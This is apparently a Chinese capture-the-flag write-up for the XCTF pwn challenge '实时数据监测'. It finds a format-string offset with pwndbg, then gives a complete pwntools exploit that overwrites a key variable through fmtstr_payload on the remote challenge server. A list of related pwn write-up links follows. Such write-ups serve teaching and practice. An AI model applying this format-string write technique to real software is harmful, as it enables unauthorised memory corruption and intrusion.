[攻防世界 pwn]——实时数据监测
[攻防世界 pwn]——实时数据监测
- 题目地址:https://adworld.xctf.org.cn/
- 题目:
checksec就不说了,没什么
ida中
只要将key里面的值修改为35795746,就好
写个小脚本在pwndbg中看看偏移
from pwn import *
p = process('./pwn')
gdb.attach(p, 'b *0x080484A7')
#p = remote("111.200.241.244",48715)
key_addr = 0x0804A048
payload = 'aaaa%4$s'
p.sendline(payload)
p.interactive()
发现偏移位12,距离输入
所以,exploit如下,fmtstr_payload是pwntools集成的模板,对于第一个参数是offest(偏移),后面是地址,和地址中写入的值。
exploit
from pwn import *
#p = process('./pwn')
#gdb.attach(p, 'b *0x080484A7')
p = remote("111.200.241.244",48715)
key_addr = 0x0804A048
payload = fmtstr_payload(12,{key_addr:35795746})
p.sendline(payload)
p.interactive()
[攻防世界 pwn]——实时数据监测相关推荐
- 攻防世界 Pwn 进阶 第一页
00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区. 攻防世界 Pwn 新手 1.栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc. 常见漏洞点有read( ...
- realloc函数UAF利用|攻防世界pwn进阶区supermarket
文章目录 思路 0x00.tar解压 0x01.查看保护 0x02.查看程序并调试 0x03.漏洞分析 realloc函数详解 0x04.利用思路 利用过程 exp-1 解法二 函数须知 0x00.查 ...
- 攻防世界(Pwn) forgot---栈溢出;(方法二)
攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...
- 攻防世界(Pwn) forgot---栈溢出;(方法一)
攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...
- 攻防世界 pwn进阶区----No.012 babyfengshui 解题思路
攻防世界 pwn进阶区----No.012 babyfengshui 解题思路 1.本题解题思路 1.先期工作 1.运行程序查看基本逻辑 创建用户 展示用户 更新用户 删除用户 到这里就可以猜测这题有 ...
- 攻防世界 Pwn 进阶 第二页
00 这文章更重要的是对这些题进行一个总结,说一些值得注意的地方,写一些自己的理解. 为了形成一个体系,想将前面学过的一些东西都拉来放在一起总结总结,方便学习,方便记忆. 攻防世界 Pwn 新手 攻防 ...
- 【pwn】攻防世界 pwn新手区wp
[pwn]攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了. 1.get_sh ...
- 攻防世界(pwn篇)---CGfsb
攻防世界(pwn篇)-CGfsb 文章目录 攻防世界(pwn篇)---CGfsb 题目描述 基本情况分析 运行分析 IDA 分析 格式化字符串漏洞 分析出payload 找一下 s 的偏移量 再看一看 ...
- [攻防世界 pwn]——pwn1(内涵peak小知识)
[攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...
最新文章
- 美电信运营商Verizon推企业云计算服务
- 一千行MySQL学习笔记(十二)
- 统计学习方法 李航---第7章 支持向量机
- WinDbg 查看静态变量
- Module build failed: Error: Node Sass version 5.0.0 is incompatible with ^4.0.0.
- 9 MM配置-主数据-维护物料管理的公司代码
- 设计模式 - 策略模式Strategy
- 服务器root账号用户名和密码忘记了,宝塔忘记后台管理员账号密码怎么办?教你用这条命令轻松搞定...
- 英特尓祭出开挖数据价值的“六脉神剑”!
- 层叠性(HTML、CSS)
- 怎么缩小界面_PDF怎么压缩变小?介绍实用的PDF压缩软件
- Linux下实现一个论文翻译阅读的小工具
- 签了之后才后悔了--转载--职场心法
- 周末鸡汤|电子游戏教给你的人生一课 from Quora
- 记大三第一学期10-1出游宜昌
- 大漠穷秋:一个写代码的浪人|码云封面人物第 17 期
- 叙述两个计算机技术的应用,《计算机技术与应用基础》复习题附答案.doc
- Win11系统管理应用程序将更便利,微软正在测试改进中
- ThinkPad T440s 改 T450s
- (4.3.1.11)微信扫描二维码无法下载apk文件解决办法